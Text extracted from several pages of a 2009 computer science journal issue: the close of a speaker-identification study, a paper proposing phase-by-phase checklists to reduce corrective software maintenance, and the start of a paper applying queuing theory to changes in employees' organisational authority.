http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 140/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1, 2009TABLE VIII. TRAIN STATION NOISE AVERAGE IDENTIFICATION R ATE (%)
FOR NOIZEOUS SPEECH CORPUS
Method
SNRMFCC ΔMFCC ΔΔMFCC RCC LPCC
15dB 86.67 90.00 53.33 70.00 76.67
10dB 76.67 76.67 53.33 66.67 73.33
5dB 63.33 66.67 46.67 56.67 63.33
0dB 60.00 63.33 46.67 53.33 60.00
Average 71.67 74.17 50.00 61.67 68.33
Table IX shows the overall average speaker identificationrate for NOIZEOUS speech corpus. From the table it is easy to
compare the performance among MFCC, ΔMFCC, ΔΔMFCC,RCC and LPCC methods for DHMM based codebook
technique. It is shown that ΔMFCC has greater performance(i.e. 79.62 [%]) than any other methods such as MFCC,
ΔΔMFCC, RCC and LPCC.
TABLE IX. OVERALL AVERAGE SPEAKER IDENTIFICATION R ATE (%) FOR
NOIZEOUS SPEECH CORPUS
MethodVarious Noises
MFCC Δ MFCC
ΔΔ MFCC
RCC LPCC
Airport Noise 79.81 81.76 53.86 60.57 65.93
Babble Noise 73.33 78.33 52.50 57.50 70.00
Car Noise 69.17 77.44 54.17 63.33 69.17
Exhibition Hall Noise 80.83 82.92 67.50 74.17 76.92
Restaurant Noise 74.58 78.25 50.94 71.67 73.33
Street Noise 74.17 80.00 55.00 70.00 73.33
Train Noise 75.84 84.08 54.17 68.33 72.08
Train Station Noise 71.67 74.17 50.00 61.67 68.33
Average Identification
Rate (%)74.93 79.62 54.77 65.91 71.14
VIII. CONCLUSION AND OBSERVATION
The experimental results reveal that the performance of the proposed codebook design method yields about 93.00 [%]identification rate in noiseless environments and 79.62 [%] innoisy environments that are seemingly higher than the previoustechniques that utilized LBG clustering method. However, a
benchmark comparison is needed to establish the superiority of this proposed method and which is underway. In the speaker identification technique, noise is a common factor thatinfluences the performance of this technique significantly. Inthis work, efficient noise removing technique has been used toenhance the performance of the proposed GA based codebook design method. So, GA based codebook design method is
capable of protect in the system from noise distortion. The performance of this system may be tested by using large speechdatabase and it will be the further work of this system.
R EFERENCES
[1] Rabiner, L., and Juang, B.-H., Fundamentals of Speech Recognition . Prentice Hall, Englewood Cliffs, New Jersey, 1993.
[2] Jain, A., R.P.W.Duin, and J.Mao., “Statistical pattern recognition: areview”, IEEE Trans. on Pattern Analysis and Machine Intelligence 22,2000, pp. 4–37.
[3] Sadaoki Furui, “50 Years of Progress in Speech and Speaker Recognition Research”, ECTI TRANSACTIONS ON COMPUTER AND INFORMATION TECHNOLOGY, vol.1, no.2, 2005.
[4] Rabiner, L.R., and Juang, B.H., “An introduction to hidden Markovmodels”, IEEE ASSP Mag., 3, (1), 1986, pp. 4–16.
[5] Matsui, T., and Furui, S., “Comparison of text-dependent speaker recognition methods using VQ-distortion and discrete=continuousHMMs”, Proc. ICASSP’92, vol. 2, 1992, pp. 157–160.
[6] Y. Linde, A. Buzo, and R.M. Gray, “An Algorithm for Vector
Quantizater Design”, IEEE Transaction on Comm., vol. 28, 1980, pp.84-95.
[7] J. G. Wilpon and L. R. Rabiner, “A modifii K-means clusteringalgorithm for use in isolated word recognition”, IEEE Trans. on Acoust..Speech, and Signal Processing, vol. ASSP-33, 1985, pp. 587-594.
[8] H. Iwamida, S. Katagiri, E. McDermott, and Y. Tohokura, “A hybridspeech recognition system using HMMs with an LVQ-trainedcodebook”, Proc. IEEE Int. Conf. Acoust.. Speech. Signal Processing,1990, pp. 489-492.
[9] Simon Doclo and Marc Moonen, “On the Output SNR of the Speech-Distortion Weighted Multichannel Wiener Filter”, IEEE SIGNALPROCESSING LETTERS, vol. 12, no. 12, 2005.
[10] Wiener, N., Extrapolation, Interpolation and Smoothing of StationaryTime Series with Engineering Applications. Wiely, Newyork, 1949.
[11] Wiener, N., Paley, R. E. A. C., “Fourier Transforms in the ComplexDomains”, American Mathematical Society, Providence, RI, 1934.
[12] Koji Kitayama, Masataka Goto, Katunobu Itou and TetsunoriKobayashi, “Speech Starter: Noise-Robust Endpoint Detection by UsingFilled Pauses”, Eurospeech 2003, Geneva, 2003, pp. 1237-1240.
[13] S. E. Bou-Ghazale and K. Assaleh, “A robust endpoint detection of speech for noisy environments with application to automatic speechrecognition”, Proc. ICASSP2002, vol. 4, 2002, pp. 3808–3811.
[14] Martin, D. Charlet, and L. Mauuary, “Robust speech / non-speechdetection using LDA applied to MFCC”, Proc. ICASSP2001, vol. 1,2001, pp. 237–240.
[15] Richard. O. Duda, Peter E. Hart, David G. Strok, Pattern Classification,A Wiley-interscience publication. John Wiley & Sons, Inc, SecondEdition, 2001.
[16] Sarma, V., Venugopal, D., “Studies on pattern recognition approach tovoiced-unvoiced-silence classification”, Acoustics, Speech, and SignalProcessing, IEEE International Conference on ICASSP '78, vol. 3, 1978,
pp. 1-4.
[17] Qi Li. Jinsong Zheng, Augustine Tsai, Qiru Zhou, “Robust EndpointDetection and Energy Normalization for Real-Time Speech and Speaker Recognition”, IEEE Transaction on speech and Audion Processing,vol.10, no.3, 2002.
[18] Harrington, J., and Cassidy, S., Techniques in Speech Acoustics. Kluwer Academic Publishers, Dordrecht, 1999.
[19] Makhoul, J., “Linear prediction: a tutorial review”, Proceedings of theIEEE 64, 4, 1975, pp. 561–580.
[20] Picone, J., “Signal modeling techniques in speech recognition”,Proceedings of the IEEE 81, 9, 1993, pp. 1215–1247.
[21] Clsudio Beccchetti and Lucio Prina Ricotti, Speech Recognition Theoryand C++ Implementation. John Wiley & Sons. Ltd., 1999, pp.124-136.
[22] L.P. Cordella, P. Foggia, C. Sansone, M. Vento., “A Real-Time Text-Independent Speaker Identification System”, Proceedings of 12thInternational Conference on Image Analysis and Processing, IEEE
Computer Society Press, Mantova, Italy, 2003, pp. 632 - 637.
[23] J. R. Deller, J. G. Proakis, and J. H. L. Hansen, Discrete-TimeProcessing of Speech Signals. Macmillan, 1993.
[24] F. Owens., Signal Processing Of Speech. Macmillan New electronics.Macmillan, 1993.
[25] F. Harris, “On the use of windows for harmonic analysis with thediscrete fourier transform”, Proceedings of the IEEE 66, vol.1, 1978,
pp.51-84.
[26] J. Proakis and D. Manolakis, Digital Signal Processing, Principles,Algorithms and Aplications. Second edition, Macmillan PublishingCompany, New York, 1992.
ISSN 1947 5500134
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 141/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1, 2009[27] D. Kewley-Port and Y. Zheng, “Auditory models of formant frequency
discrimination for isolated vowels”, Journal of the Acostical Society of America, 103(3), 1998, pp. 1654–1666.
[28] D. O’Shaughnessy, Speech Communication - Human and Machine.Addison Wesley, 1987.
[29] E. Zwicker., “Subdivision of the audible frequency band into critical bands (frequenzgruppen)”, Journal of the Acoustical Society of America,33, 1961, pp. 248–260.
[30] S. Davis and P. Mermelstein, “Comparison of parametric representations
for monosyllabic word recognition in continuously spoken sentences”,IEEE Transactions on Acoustics Speech and Signal Processing, 28,1980, pp. 357–366.
[31] S. Furui., “Speaker independent isolated word recognition usingdynamic features of the speech spectrum”, IEEE Transactions onAcoustics, Speech and Signal Processing, 34, 1986, pp. 52–59.
[32] S. Furui, “Speaker-Dependent-Feature Extraction, Recognition andProcessing Techniques”, Speech Communication, vol. 10, 1991, pp.505-520.
[33] Koza, J .R., Genetic Programming: On the programming of computers by means of natural selection. Cambridge: MIT Press, 1992.
[34] D.E. Goldberg, Genetic Algorithms in Search, Optimization andMachine Learning. Addison- Wesley, Reading, MA, 1989.
[35] Z. Michalewicz, Genetic Algorithms + Data Structures = EvolutionPrograms. Springer-Verlag, New York, USA, Third Edition, 1999.
[36] Rajesskaran S. and Vijayalakshmi Pai, G.A., Neural Networks, FuzzyLogic, and Genetic Algorithms- Synthesis and Applications. Prentice-Hall of India Private Limited, New Delhi, 2003.
[37] Hu, Y. and Loizou, P., “Subjective comparison of speech enhancementalgorithms”, Proceedings of ICASSP-2006, I, Toulouse, France, 2006,
pp. 153-156,.
[38] Hu, Y. and Loizou, P., “Evaluation of objective measures for speechenhancement”, Proceedings of INTERSPEECH-2006, Philadelphia, PA,2006.
AUTHORS PROFILE
Md. Rabiul Islam was born in Rajshahi, Bangladesh,on December 26, 1981. He received his B.Sc. degree inComputer Science & Engineering and M.Sc. degrees inElectrical & Electronic Engineering in 2004, 2008,respectively from the Rajshahi University of Engineering & Technology, Bangladesh. From 2005 to2008, he was a Lecturer in the Department of Computer Science & Engineering at Rajshahi University of Engineering & Technology. Since 2008, he has been an
Assistant Professor in the Computer Science & Engineering Department,University of Rajshahi University of Engineering & Technology, Bangladesh.His research interests include bio-informatics, human-computer interaction,speaker identification and authentication under the neutral and noisyenvironments.
Md. Fayzur Rahman was born in 1960 in Thakurgaon,Bangladesh. He received the B. Sc. Engineering degreein Electrical & Electronic Engineering from RajshahiEngineering College, Bangladesh in 1984 and M. Techdegree in Industrial Electronics from S. J. College of Engineering, Mysore, India in 1992. He received thePh. D. degree in energy and environmentelectromagnetic from Yeungnam University, South
Korea, in 2000. Following his graduation he joined again in his previous job
in BIT Rajshahi. He is a Professor in Electrical & Electronic Engineering inRajshahi University of Engineering & Technology (RUET). His currentresearch interest are Dgital Sgnal Pocessing, Electronics & Machine Controland Hgh Vltage Dscharge Aplications. He is a member of the Institution of Engineer’s (IEB), Bangladesh, Korean Institute of Illuminating andInstallation Engineers (KIIEE), and Korean Institute of Electrical Engineers(KIEE), Korea.
ISSN 1947 5500135
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 142/215
A Step towards Software Corrective Maintenance:
Using RCM model
Shahid Hussain Muhammad Zubair Asghar
Department of computing ICITNamal College Gomal University
Mianwali, Pakistan Dera Ismail Khan, Pakistan
Shahidhussain2003@yahoo.com zubair_icit@yahoo.com
Bashir Ahmad Shakeel AhmadICIT ICIT
Gomal University Gomal University
Dera Ismail Khan, Pakistan Dera Ismail Khan, Pakistan
bashahmad@gmail.com Shakeel_1965@yahoo.com
Abstract--From the preliminary stage of software engineering,
selection of appropriate enforcement of standards remained achallenge for stakeholders during entire cycle of software
development, but it can lead to reduce the efforts desired for
software maintenance phase. Corrective maintenance is the
reactive modification of a software product performed after
delivery to correct discovered faults. Studies conducted by
different researchers reveal that approximately 50 to 75% of the
effort is spent on maintenance, out of which about 17 to 21% is
exercised on corrective maintenance. In this paper, authors
proposed a RCM (Reduce Corrective Maintenance) model which
represents the implementation process of number of checklists to
guide the stakeholders of all phases of software development.
These check lists will be filled by corresponding stake holder of
all phases before its start. More precise usage of the check list in
relevant phase ensures successful enforcement of analysis, design,
coding and testing standards for reducing errors in operation
stage. Moreover authors represent the step by step integration of
checklists in software development life cycle through RCM
model.
Keywords—RCM model, Maintenance, Checklist, Corrective
maintenance, stakeholders.
I. INTRODUCTION
The selection of proper enforcement of standards is the
challenging task right from early stage of software engineering
which has not got definite importance by the concerned
stakeholders. Software maintenance takes more effort than all
other phases of software life cycle, but it has not been given as
much importance as it deserved. It is an admitted fact thatapproximately 60 to 70% effort is spent on maintenance phase
of software development life cycle. Software maintenance is
classified into corrective, adaptive, perfective and preventive
maintenance. According to IEEE[2, 3], corrective maintenance
is the reactive modification of software product performed
after delivery to correct discovered faults, adaptive
maintenance is the modification of a software product
performed after delivery to keep software usable in a changed
or changing environment, perfective maintenance is the
modification of a software product after delivery to improve
performance or maintainability and preventive maintenance isperformed for the purpose of preventing problems before they
occur. In this paper the main focus of authors is towards
corrective maintenance to overcome the all problems arising
in requirements, design, coding, documentation and testing
activities.
According to Yogesh [1] software maintenance process is
costs 50% for Perfective maintenance, 25% for Adaptive
maintenance, 21% for Corrective maintenance and 4% for
Preventive maintenance. In this paper authors proposed a
RCM model to reduce the maintenance cost by incorporating
checklists for concerned stakeholder of each phase of software
development life cycle. This would lead to reduction of post
efforts made by stake holders during corrective maintenanceand decrease the percentage effort of corrective maintenance
suggested by Yogesh[ 1 ].
II. SOFTWARE MAINTENANCE
Software maintenance is the process to correct the faults arises
in software product after its delivery. IEEE [2, 3] definition
for software maintenance is:
The modification of a software product after delivery
to correct faults, to improve performance or other attributes
or to adapt the product to a modified environment .
It has been observed during different studies that softwaremaintenance is the most time consuming activity in SDLC ,
Fig-1 shows maintenance iceberg depicting the time
consuming nature of software maintenance. Software is to be
modified when it is not fulfilling the needs of the environment
in which it works.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500136
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 143/215
Different models and techniques are proposed by researchers
in the area of software corrective maintenance [4, 5, 6]. Walia
and Jeffrey proposed a catalog C[7] for aid of developers toreduce errors during the requirement inspection process and to
improve overall software quality. The Study of Jie-Cherng
Chen and Sun-Jen Huang [8] show the empirical evidence for
all those problem factors which are faced during the software
development phase and affects the software maintainability
negatively. Similarly, Andrea De Lucia et ,al [9] provided an
empirical assessment and improvement of the effort estimation
model for corrective maintenance. Authors’ proposed model
provides an easy and sequential procedure for integrating
checklists into SDLC for reducing effort for software
corrective maintenances
III. RCM MODEL
The whole work of software development life cycle is dived
into five main phases such as requirement elicitation,
requirement specification, designing, coding and testing. In
each phase if roles are not properly guided to operate their
activities then it can cause to increase the efforts required for
maintenance of software especially for corrective
maintenance. In this paper authors use RCM model to provide
guidelines to concerned stakeholders of each phase of software
development life cycle. The working of RCM model is
represented through Figure-1. Before the start of each phase
concerned stack holders fill a checklist which guides them
about standard methods to perform their activities. If all
concerned stakeholders of each phase worked according to the
guidelines of checklist then it can affect the total effortrequired for software corrective maintenance. The
stakeholders of requirement elicitation phase will fill the
checklist shown in Table-1 before start of their work. The
evaluation result of this checklist will show that all
requirements are clear and understandable to concerned
stakeholders. This would lead to reduce the error chances
which can arise due to ambiguities in requirement elicitation
process. The stakeholders of requirement specification phase
will fill the checklist shown in Table-2 before the start of their
work. The evaluation result of this checklist will show that
specification of requirements is understandable to the
concerned stakeholders and reduces the error chances which
can arise due to improper specification of requirements. Thestakeholders of designing phase will fill the checklist shown in
Table-3 before the start of their work. The evaluation result of
this checklist will show that the architectural, data, procedural
and user interface designing of software is understandable to
the concerned stack holders and reduces the error chances
which can arise due to lack of proper understanding of
designing activities. The stakeholders of coding phase will fill
the checklist shown in Table-4 before the start of their work.
The evaluation result of this checklist will show that coding
standard features are understandable to concerned stakeholders
and reduces the error chances which can arise due to lack of
proper understanding of coding constructs. The stakeholders
of testing phase will fill the checklist shown in Table-5 before
the start of their work. The evaluation result of this checklist
will show that software will be tested with respect to each
aspect and reduces the error chances which can arise due to
improper testing process.
Development
Maintenance
Fi ure-1 MaintenanceIceBer Martinand McClure1983
Re uirement S ecification
Desi n
Codin
RE Check ListRe uirement Elicitation
RS Check List
Desi n Check List
Codin Check List
SDLC Phases Check-Lists Stakeholders
Testin Codin Check List
Figure- 2. RCM Model for Software Corrective Maintenance
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500137
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 144/215
The checklist for requirement elicitation phase enables the
concern stakeholders to identify the requirements in a clear
and precise way. Repetition in gathered requirement should be
avoided, easy to understand in recommended natural.
Moreover dependencies among requirements should be clear
and once requirement elicitation is completed, then further no
requirement can be gathered. If concern stakeholder such as
system analyst follows this checklist in precise manner then
errors which can arise due to inconsistencies and repetition
can be avoided and it will directly impact the corrective
maintenance efforts. The column heading Yes and No of
Table-1 show that given points of checklist are clearly
understandable by concern stakeholders or not. And the
checklist will be analyzed on the base of these values.
Moreover, same concept is used for other checklists.
The checklist for requirement specification phase enables the
concern stakeholders to use proper methods for specification
of requirements. It ensures that SRS should be clear and
understandable to all stakeholders. The stakeholders of this
phase should have sufficient knowledge of formal and
informal specification and its tools or languages.
ACTIVITY CODE DESCRIPTION YES NO
RS-1 The structure of SRS is clear and understandable
RS-2 Knowledge of informal specification of requirements
RS-3 Knowledge of formal specification of requirements
RS-4 Use of informal specification tool or language
RS-5 Use of formal specification tool or language
RS-6 SRS must be clear to all stack holders
RS-7 Data, functional and behavioral modeling is understandable
The checklist for designing phase enables the concern
stakeholders to perform both back-end and front-end
designing of softwares in precise form. This checklist leads
to make easy and understandable transformation process of
analysis model into different types of designing models such
as architectural, data, procedural and user interface designing.
The relationship among modules should be clear and
understandable for all stakeholders.
ACTIVITY CODE DESCRIPTION YES NO
D-1 SRS is clear and understandable
D-2 Architectural design of software is clear and users have performed acceptance
testing
D-3 Black box testing on architectural design have been performed
D-4 Database designing is properly designed and understandable
D-5 Relationship among dependent modules is clear
D-6 User interface designing is accepted by user
D-7 Data Dictionary is clear and properly designed
D-8 Design strategy either top-down or bottom-up is clear
D-9 Standards for procedural designing are clear
ACTIVITY CODE DESCRIPTION YES NO
RE-1 Natural Language for requirement gathering is understandable.
RE-2 No requirement would be repeated
RE-3 Each requirement should be clear and accurate
RE-4 The source of each dependent requirement should identifiable.
RE-5 All sources to collect requirement should be known able.
RE-6 Take full detail of each requirement from customer
RE-7 No requirement of customer will entertain after collecting all requirements andstarting of new phase
TABLE-1. CHECKLIST FOR STAKEHOLDERS OF REQUIREMENT ELICITATION PHASE
TABLE-2. CHECKLIST FOR STAKEHOLDERS OF REQUIREMENT SPECIFICATION PHASE
TABLE-3. CHECKLIST FOR STAKEHOLDERS OF DESIGN PHASE
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500138
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 145/215
The checklist for coding phase enables the concern
stakeholders to clearly understand the basic construct such
variable, array and functions of programming language.
Moreover, this checklist shows that validation process of
text and exception handling process will be clear to concern
stakeholders.
The checklist for testing phase enables the concern
stakeholders to clearly understand the testing methods such
as white-box, grey-box and black-box. Moreover, this
checklist presents that all testing activities will be done
properly and understandable to all stakeholders.
ACTIVITY CODE DESCRIPTION YES NO
T-1 Unit testing for each component should be properly performed
T-2 Module level testing should be properly performed
T-3 Modules are properly integrated and tested
T-4 Function of each module should be tested through functional testing
T-5 In white-box testing, each path should be clearly defined
T-6 Use of all constructs of programming language should be properly tested.
T-7 Functional requirement of users should be tested
IV IMPLEMENTATION PLAN
The implementation process of RCM model has been started
shown in fig-3. Two teams of students are used to develop
same project. The development experience level of all
students of both teams is same. The development andmaintenance process for first project will be ordinary but in
second project development and maintenance team will
follow the rules of RCM model and will analyzed the result.
The stakeholders of team, which are using RCM model, are
trained to understand the purpose of checklist. For example if
a programmer can not understand the function of use of
buffer, multi threading, recursive calling, parameters’ scope
and access, or multi tasking then he cant not fill the related
checklist effectively. Before start of project, only the
stakeholders of requirement elicitation phase will be trained.
When Requirement Elicitation will going to end then parallel
training of next phase stakeholders will be started and this
process will remains continue till the end of software’
development. This strategy will helps to reduce the extra time
consumed on stakeholders’ training. The project manager willbe responsible to overlook the work of both projects and
analyze the result.
Different factors are targeted to analyze the performance of
RCM model such as quality, defect rates, reduction in efforts,
cost, complexity, productivity and reliability.
ACTIVITY CODE DESCRIPTION YES NO
C-1 Each variable should be correctly typed.
C-2 Used data structure should be clear
C-3 Scope of all variables should be clear
C-4 Variables are initialized without garbage values
C-5 Size of buffers is appropriated.
C-6 Buffer’s overflow are properly checked
C-7 Signatures of function are understandable
C-8 Functions should be properly called
C-9 Use of formal and actual parameters should be clear
C-10 Recursive function should be properly called and ended
C-11 All other construct of programming language should be properly used
C-12 Use of third party control is valid.
C-13 All database files should be proper open or close when control is transfer from one
module to another.
C-14 Proper validation rules and validation text should be defined
C-15 Exception handling should be properly embedded into program structure
TABLE-4. CHECKLIST FOR STAKEHOLDERS OF CODING PHASE
TABLE-5. CHECKLIST FOR STAKEHOLDERS OF TESTING PHASE
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500139
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 146/215
V. CONCLUSION
Software maintenance process consumes half of the budget
and time to complete a software project and usually 21% of total maintenance efforts are devour by corrective
maintenance. The corrective maintenance efforts are
increases due to flaws remains in other phase of software
development life cycle. These flaws can be overcome if
stakeholders fully understand the activities of each concern
phase. Authors proposed a RCM model which comprises on
filling and analyzing process of checklists in each phase. If
all stakeholders of each phase filled the checklist in precise
manner then evaluated result of each checklist shows that
how much stakeholder have understand the activities. Such
process would leads to reduce the corrective maintenance
effort which is increasing the overall effort percentage of
software maintenance. RCM model is in its infancy period,it just presents an idea of how to reduce software corrective
maintenance effort. Moreover, the checklist of RCM can be
updated by stakeholder who will apply this model during
development process of software.
REFERENCES
[1] Yogesh Singh and Bindu Goel, “A Step Towards SoftwarePreventive Maintenance”, ACM SIGSOFT Software Engineering Notes,Volume 32 Number 4, July 2007.
[2]. IEEE, “IEEE Standard for Software Maintenance”, IEEE Std 1219-1998. The Institute of Electrical and Electronics Engineers, Inc. 1998.
[3] IEEE, “IEEE Standard for Software Maintenance”, IEEE Std 14764-2006. The Institute of Electrical and Electronics Engineers, Inc. 2006.
[4]. Scott D. Fleming et al, A study of student strategies for the correctivemaintenance of concurrent software, ICSE '08: Proceedings of the 30thinternational conference on Software engineering Publisher: ACM, May2008.
[5] Mariam Sensalire et al, “Classifying desirable features of softwarevisualization tools for corrective maintenance” , SoftVis '08: Proceedingsof the 4th ACM symposium on Software visualization Publisher: ACM ,September 2008.
[6]. Mira Kajko-Mattsson, Stefan Forssander, Ulf Olsson, “Correctivemaintenance maturity model” (CM3): maintainer's education and training,ICSE '01: Proceedings of the 23rd International Conference on SoftwareEngineering Publisher: IEEE Computer Society, July 2001.
[7] Gursimran Singh Walia a, Jeffrey C. Carver b , “A systematic literaturereview to identify and classify software requirement errors”, Information
and Software Technology 51 (2009) 1087–1109, 2009 Elsevier B.V.< http:// www.elsevier.com/ locate/ infsof> [8] Jie-Cherng Chen, Sun-Jen Huang, “An empirical analysis of the impact
of software development problem factors on software maintainability”, The
Journal of Systems and Software 82 (2009) 981–992, 2009 Elsevier Inc. <http:// www.elsevier.com/ locate/ jss>
[9] Andrea De Luciaa,*, Eugenio Pompellab, Silvio Stefanuccic,“Assessing effort estimation models for corrective maintenance through
empirical studies”, Information and Software Technology 47 (2005) 3–15,
<http:// www.elsevier.com/locate/infsof >
Project
Team 1 Using Ordinary
Development process
Team 1 Using Ordinarymaintenance process
Team 2 Using RCMmodel in Development
process
Team 2 Using RCMmodel in maintenance
process
Project manager will overlook thework of both team and will
analyze the targeted factors such
as reliability, maintainability,productivity, complexity etc
Checklists will
be used byrelated stake
holders
Figure-3. Flow graph for Implementation Strategy
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500140
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 147/215
Mr. Shahid Hussain has done MS in Software Engineeringfrom City University, Peshawar, Pakistan. He has gotdistinction throughout his academic carrier. He has done hisresearch by introducting best practices in different softwareprocess models. I have introduced a new rolecommunication model in RUP using pairing programmingas best practise.. Recently, I am working as coursechaircum Leccturer in Namal College, an associate college of University of Bradford. Moreover, I have publish manyresearch paper in different national/international journalsand conferences such as MySec04, JDCTA, IJCSIS,NCICT, ZABIST.
Similarly, I have worked as computer programmer with
SRDC (British Council), Peshawar, Pakistan and havedeveloped many softwares. My furtue aim is to join anorganization where I can polish my abilities.
Dr. Shakeel Ahmad received his B.Sc. with distinctionfrom Gomal University, Pakistan (1986) and M.Sc.(Computer Science) from Qauid-e-Azam University,Pakistan (1990). He served for 10 years as a lecturer inInstitute of Computing and Information Technology (ICIT),Gomal University Pakistan. Now he is serving as anAssistant Professor in ICIT, Gomal University Pakistansince 2001. He is among a senior faculty member of ICIT.Mr. Shakeel Ahmad received his PhD degree (2007) inPerformance Analysis of Finite Capacity Queue underComplex Buffer Management Scheme.
Mr. Shakeel’s research has mainly focused on developingcost effective analytical models for measuring theperformance of complex queueing networks with finite
capacities. His research interest includes Performancemodelling, Optimization of congestion control techniques,Software refactoring, Network security, Routing protocolsand Electronic learning. He has produced manypublications in Journal of international repute and alsopresented papers in International conferences.
Mr. Muhammad Zubair Asghar is an MS student inInstitute of Computing and information technology, GomalUniversity D.I.Khan, Pakistan. He has got distinctionthroughout his academic carrier. He is doing specializationin the area of software corrective maintenance. Author hasalso done work in the area of Artificial intelligence and got
published two international publications in the areas of Robot simulation and medical expert systems.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
ISSN 1947 5500141
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 148/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. 1 & 2, 2009
Electronic Authority Variation
M.N.Doja
CSE Department
Jamia Millia Islamia New Delhi, India
ndoja@yahoo.com
Dharmender Saini
CSE Department
Jamia Millia Islamia New Delhi, India
dsaini77@yahoo.com
Abstract— when a person joins in an organization,
he becomes authorize to take some decisions on
behalf of that organization; means he is given some
authority to exercise. After some time, on the basis
of his performance in the organization, he is given
promotion and he becomes eligible to exercise to
some higher authorities. And further, he may get
some higher promotion or he may leave the
organization. So, during his stay in the
organization, the authority of that person variesfrom the time he joins the organization until he/she
leaves the organization. This paper presents the
variation in authorities of a person in the
organization. The method implements the queuing
model to analyze the various people in the queue of
their promotion and looks at various parameters
like average waiting time etc.
Keywords- Authority: Authority Variation:
Authority Level
I. I NTRODUCTION
The problem of authorization was raised in
1990 by Fischer [1] for he confirmation of theoriginality of source. Russell [2] in 1994described the problem in detail and suggestedvarious options available to the receiver. Hesuggested some basic principles of authorizationat source like auditing by receiver, trusted third
party originator, and self audit. He further categorized authorization in two parts i.e. person
based authorization and rule based authorization.Person based authorization uses digital signaturesand certificates, where as a rule basedauthorization is based on rules provided to thereceiver for verification of authorization. Thomaswoo [3] in 1998 suggested the design of
distributed authorization service which parallelsexisting authentication services for distributedsystems. In 2000 Michiharu and Santoshi [4]
presented xml document security based on provisional authorization. They suggested an xmlaccess control language (XACL) that integratessecurity features such as authorization, non-repudiation, confidentiality, and an audit trail for xml documents. During the period of 1996 to2005 various types of authorization and its
application like [5, 6, 7] were suggested. In 2005[8] Burrows presented a method for XSL/XML
based authorization rules policy implementationthrough filing a patent in united state patentoffice. he implemented XSL/XML basedauthorization rules policy on a given set of dataand used an authorization rules engine which usesauthorization rules defined in XSL to operate onaccess decision information (ADI) provided by
the user. Inside the authorization rules engine, a boolean authorization rules mechanism isimplemented to constrain the XSL processor toarrive at a boolean authorization decision. Whena person joins in an organization, he becomesauthorize to take some decisions on behalf of thatorganization; means he is given some authority toexercise. After some time, on the basis of his
performance in the organization, he is given promotion to some higher level and he becomeseligible to exercise to some higher authorities.And further, he may get some higher promotionor he may leave the organization. So, during hisstay in the organization, the authority of that
person varies from the time he joins theorganization until he/she leaves the organizationand also he remain in the queue [10, 11, 12] for next position. This paper presents the variation inauthorities of a person in the organization. Assoon as the person gets the promotion his/her authority database is updated to reflect the currentauthorities. The method implements the queuingmodel to analyze the various people in the queueof their promotion and looks at various
parameters like average waiting time etc.
This paper is organized in four parts. Part 1 presents introduction to the problem addressed,
Part II explains the Queuing Theory basics, PartIII presents the Queuing Model implementationfor our scheme and Part IV presents XML Policyfor the User is used in this system. Part V
presents Authority Variation when a personmoves from one level of the queue to other level.Part VI presents conclusion and Part VII presentsapplication and future scope.
ISSN 1947 5500142
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 149/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. 1 & 2, 2009
II. QUEUING THEORY BASICS
Queuing theory [10, 11] is a mathematicalconcept which is used the application study its
various application in technology and all other
related areas. We have used this concept to study
people in organization are basically a queue of
various points for example they may be in promotion queues. When they enter in the
organization they are in the queue. When they
are inside in the organization they are in thequeue of promotion. Here we are studying the
case when they are inside the organization and
they are in the promotion queue. For example
employees from level one L1 gets promotion to
higher level two L2 and then higher and so on.But for simplicity, here we have taken only three
levels i.e. L1, L2, and L3.
So, just for brief introduction to this concept
the brief introduction of this concept is presented.
The three basic terms in queuing theory are
customers, queues, and servers.
A. Customers
Customers are generated by an input source.The customers are generated according to astatistical distribution and the distributiondescribes their interarrival times, i.e the times
between arrivals of customers. The customers join a queue. In our system customers are person joining the organization.
B. Server (Service Mechanism)
Customers are selected for service by theserver at various times. The rule on the basis of which the customers are selected is called thequeue discipline. The head of the queue is thecustomer who arrived in the queue first and tale, a
person who is in the last. In our system the server is the organization authorities.
C. Input Source
The input source is a population of individuals, and as such is called the calling
population. The calling population has a size,which is the number of potential customers to thesystem. The size can either be finite or infinite.The input source in our system is the processwhich supplies person to the organizationdepartment fro example Human ResourceProcess.
D. Queue
Queues are either infinite or finite. If a queueis finite, it holds a limited number of customers.The amount of time a customer waits in the queueis called the queuing time. The number of customers who arrive from the calling populationand join the queue in a given period of time ismodeled by a statistical distribution. In our system, we have taken the queue of people,waiting for their promotion or their authority toupgrade.
E. Queue Discipline
The queue discipline is a rule through whichcustomers are selected from the queue for
processing by servers. For example, first-come-first-served (FCFS), where the customers are
processed in the order they arrived in the queue.Most queuing models assume FCFS as the queuediscipline. We have also assumed the same
approach. In our system the queue discipline isthe rule on the basis of which the promotion of employees occur.
F. Basic Notations [10]
λ n : Mean arrival rate of new customerswhen n customers are in the system.
μn : Mean service rate (expected number of customers completing service per unit time) whenn customers are in the system.
